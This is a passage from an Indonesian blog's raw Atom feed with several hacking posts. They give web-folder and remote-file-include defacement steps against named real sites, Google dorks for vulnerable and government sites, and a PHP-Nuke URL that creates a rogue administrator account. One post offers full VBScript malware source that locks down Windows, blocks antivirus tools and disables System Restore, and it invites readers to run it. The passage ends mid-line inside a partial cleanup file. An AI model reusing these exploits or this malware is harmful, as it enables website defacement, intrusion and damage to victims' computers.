&lt;br /&gt;suatu web&lt;br /&gt;&lt;br /&gt;3. Buka My computer pada desktop dan lihat icon web folder&lt;br /&gt;&lt;br /&gt;4. Klik 2 kali pada icon web folder tersebut&lt;br /&gt;&lt;br /&gt;5. klik 2 kali pada icon add web folder&lt;br /&gt;&lt;br /&gt;6. Isikan URL target di popup yang muncul misalkan target kita adalah&lt;br /&gt;http://www.pertamina.co.id maka isikan URL tersebut&lt;br /&gt;&lt;br /&gt;7. klik next lalu finish&lt;br /&gt;&lt;br /&gt;8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut&lt;br /&gt;dengan file file yang akan tampil pada halaman web apabila kita mengunjungi&lt;br /&gt;web tersebut&lt;br /&gt;&lt;br /&gt;9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau&lt;br /&gt;index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,&lt;br /&gt;biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web&lt;br /&gt;milik orang lain , hanya mengingatkan.&lt;br /&gt;&lt;br /&gt;10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang&lt;br /&gt;telah kita buat&lt;br /&gt;&lt;br /&gt;11. Save di komputer anda.&lt;br /&gt;&lt;br /&gt;12. Proses Deface selesai.&lt;br /&gt;&lt;br /&gt;Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan&lt;br /&gt;google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau&lt;br /&gt;mencari situs pemerintah ketikan keyword “web: .go.id”&lt;br /&gt;Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari&lt;br /&gt;terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang&lt;br /&gt;hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.&lt;br /&gt;Selamat mencoba.&lt;br /&gt;&lt;br /&gt;Cara Mudah Deface Remote File Include&lt;br /&gt;&lt;br /&gt;Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..&lt;br /&gt;&lt;br /&gt;cd namadirectory = Melihat Suatu directory&lt;br /&gt;ls -al = Melihat Suatu Directory Lebih Dalam lagi&lt;br /&gt;find = Mengecek Directory directory&lt;br /&gt;cat = Membaca Suatu Berkas&lt;br /&gt;wget = MengUpload suatu Files&lt;br /&gt;tar -zxvf = MengExtraxt suatu files yang berbentuk tgz&lt;br /&gt;pwd = Mengetahui Di Directory mana Kita Berada&lt;br /&gt;uname -a = Keberadaan Path berada&lt;br /&gt;w = Mengetahui Siapa Saja yang telah menggunakan Shell.&lt;br /&gt;curl = mendownload url&lt;br /&gt;&lt;br /&gt;[EvilShellInject] = inject rshell / c99 kamu&lt;br /&gt;&lt;br /&gt;Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :&lt;br /&gt;&lt;br /&gt;Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com&lt;br /&gt;&lt;br /&gt;- Site Oneadmin RFI&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=&lt;br /&gt;&lt;br /&gt;Contoh :&lt;br /&gt;http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]&lt;br /&gt;&lt;br /&gt;- PnPhpBB2&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…&lt;br /&gt;&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]&lt;br /&gt;&lt;br /&gt;Contoh :&lt;br /&gt;http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]&lt;br /&gt;&lt;br /&gt;- Support Ticket&lt;br /&gt;&lt;br /&gt;Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…&lt;br /&gt;nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&amp;amp;include_dir=&lt;br /&gt;&lt;br /&gt;Contoh : … http://target.com/include/main.php?config[search_disp]=true&amp;amp;include_dir=[EvilShellInject]&lt;br /&gt;&lt;br /&gt;Hehehe Lumayan banyak kan ? Nah selamat mencobanya..&lt;br /&gt;Neh aku kasi beberapa web yang telah berhasil saya Deface..&lt;br /&gt;&lt;br /&gt;Nah setelah itu buadlah sebuad file: index.html&lt;br /&gt;&lt;br /&gt;Isi dengan:&lt;br /&gt;&lt;br /&gt;Hacked by Nama Kamu&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Kemudian upload deh file ke directorynya&lt;br /&gt;&lt;br /&gt;kemudian buka website yang telah di deface:&lt;br /&gt;http://target.com/lokasipathnya/index.html&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-322079168671893216?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/322079168671893216/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/deface-website-lagi.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/322079168671893216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/322079168671893216'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/deface-website-lagi.html' title='DEFACE WEBSITE LAGI'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7920738594803704025</id><published>2010-02-02T15:22:00.000+07:00</published><updated>2010-02-02T15:23:37.827+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>deface website sederhana</title><content type='html'>cara deface paling sederhana langkah langkahnya sebagai berikut&lt;br /&gt;Buka situs google&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;kemudian ketik keyword nya ==&gt; allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php&lt;br /&gt;&lt;br /&gt;Nah ..... kalo sudah ketemu targetnya maka langkah selanjutnya adalah :&lt;br /&gt;&lt;br /&gt;1. www.target.com/nuke/index.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. www.target.com/nuke/index.php ==&gt; index.php tadi dirubah menjadi admin.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Tambahkan bug ini dibelakang situs tadi :&lt;br /&gt;&lt;br /&gt;?op=AddAuthor&amp;add_aid=nino&amp;add_name=nno&amp;add_pwd=ninoalone&amp;add_email=nino@linuxmail.org&amp;add_radminsuper=1&amp;admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;jadi ketik di url kamu seperti contoh dibawah ini :&lt;br /&gt;&lt;br /&gt;www.target.com/nuke/admin.php?op=AddAuthor&amp;add_aid=nino&amp;add_name=nno&amp;add_pwd=ninoalone&amp;add_email=nino@linuxmail.org&amp;add_radminsuper=1&amp;admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Kalo berhasil, maka di url/browsing kamu akan muncul : www.target.com/nuke/admin.php?op=mod_author&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Kalo gak, berarti situs tsb udah di path ama admin nya.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Kalo berhasil, disana kamu di suruh login, masukin id &amp; password kamu tadi. Masih ingat kan ???&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;id=nino ==&gt; liat point 3 diatas&lt;br /&gt;password=ninoalone ==&gt; liat point 3 diatas&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nah . . . kamu sekarang sudah masuk ke "Administration Menu" situs tsb. Berarti kamu sudah mengusai situs tsb sekarang ! Hehehe...&lt;br /&gt;&lt;br /&gt;Sekarang kamu pilih gambar Handphone (dibawahnya ada tulisan Messages), lalu ketik :&lt;br /&gt;&lt;br /&gt;title ==&gt;Defaced by NinO&lt;br /&gt;content ==&gt;Hey admin.......find your hole and close it..Greetz to everyone at CuPu²&lt;br /&gt;expiration ==&gt; pilih unlimited trus klik tab add messages yang ada di bawah&lt;br /&gt;&lt;br /&gt;Kalo sudah, buka url/browsing baru lalu ketikkan situs target tadi, misal : www.target.com/nuke atau www.target.com/nuke/index.php&lt;br /&gt;&lt;br /&gt;kalo nggak ada hasil deface kamu coba klik tab refresh yang ada diatas yg disamping url/browsing kamu.&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7920738594803704025?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7920738594803704025/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2010/02/deface-website-sederhana.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7920738594803704025'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7920738594803704025'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2010/02/deface-website-sederhana.html' title='deface website sederhana'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7992805406076564461</id><published>2010-01-29T13:58:00.002+07:00</published><updated>2010-01-29T14:05:07.605+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VIRUS'/><title type='text'>sampel virus</title><content type='html'>haloo semua ketemu lagi nih....&lt;br /&gt;ini ada sampel virus... aku dapat dari forum Smadav&lt;br /&gt;silahkan yang mau uji coba yah...&lt;br /&gt;copy dari sini&lt;br /&gt;--------------------------------------------------------------------------------------&lt;br /&gt;'FLyff 666.dll.vbs&lt;br /&gt;&lt;br /&gt;set rg = createobject("WScript.Shell")&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&amp;amp;"\Flyff 666.dll.vbs"&lt;br /&gt;rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Flyff 666"&lt;br /&gt;rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"&lt;br /&gt;rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger",""&lt;br /&gt;rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger",""&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption", "H4x0r3d By Flyff 666"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText", "Saya Adalah Program Jahat yang Akan Mengambil Alih Komputer kalian !! System Hasbeen Hacked BY : Flyff 666 From Indonesian Hackers Community"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"&lt;br /&gt;rg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"&lt;br /&gt;------------------------------------------------------------------------------------------------&lt;br /&gt;setelah dicopy dan paste pada notepad kamu&lt;br /&gt;beri nama virus itu terserah kamu terus belakangnya kasih ekstensi .vbs contoh =   gilabener.vbs&lt;br /&gt;cara uji cobanya tinggal klik 2x ok selamat mencoba....&lt;br /&gt;uups lupa ini anti dot nya:&lt;br /&gt;----------------------------------------------------------------------------------------------&lt;br /&gt;[Version]&lt;br /&gt;Signature=”$Chicago$”&lt;br /&gt;Provider=Fariskhi&lt;br /&gt;[DefaultInstall]&lt;br /&gt;AddReg=UnhookRegKey&lt;br /&gt;DelReg=del&lt;br /&gt;[UnhookRegKey]&lt;br /&gt;HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”&lt;br /&gt;[del]&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu&lt;br /&gt;HKCU, Software\Microsoft\Windows\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"&lt;br /&gt;HKCU, Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1",&lt;br /&gt;HKCU, Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText&lt;br /&gt;HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Flyff 666 VM_Community"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Saya Adalah Program Jahat yang Mengambil Alih Komputer kalian !! dibuat Oleh Flyff 666"&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",&lt;br /&gt;HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 